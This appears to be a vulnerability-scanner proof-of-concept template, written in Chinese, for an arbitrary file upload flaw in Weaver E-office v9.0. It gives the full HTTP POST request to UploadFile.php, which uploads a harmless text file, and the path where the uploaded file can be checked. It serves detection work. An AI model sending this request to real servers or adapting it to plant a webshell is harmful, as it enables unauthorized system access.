<DudePoc_Name>泛微 E-office v9.0 任意文件上传漏洞</DudePoc_Name>
<DudePoc_Description>上海泛微网络科技股份有限公司E-office submit.php 存在文件上传漏洞，攻击者可利用该漏洞获取系统权限。</DudePoc_Description>
<DudePoc_SetHeader>
POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
Host: $<AttackHost>$
Content-Length: 0
Content-Type: multipart/form-data; boundary=cd3e4e75b997661a11274a2267484e1d
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.57
</DudePoc_SetHeader>
<DudePoc_SetData>
--cd3e4e75b997661a11274a2267484e1d
Content-Disposition: form-data; name="Filedata"; filename="abc.txt"

hiword123

--cd3e4e75b997661a11274a2267484e1d--
</DudePoc_SetData>
<DudePoc_VerifyStatusCode>200</DudePoc_VerifyStatusCode>
<DudePoc_VerifyData>logo-eoffice.txt</DudePoc_VerifyData>
<DudePoc_VerifyFile>/images/logo/logo-eoffice.txt</DudePoc_VerifyFile>
<DudePoc_AttackCode></DudePoc_AttackCode>
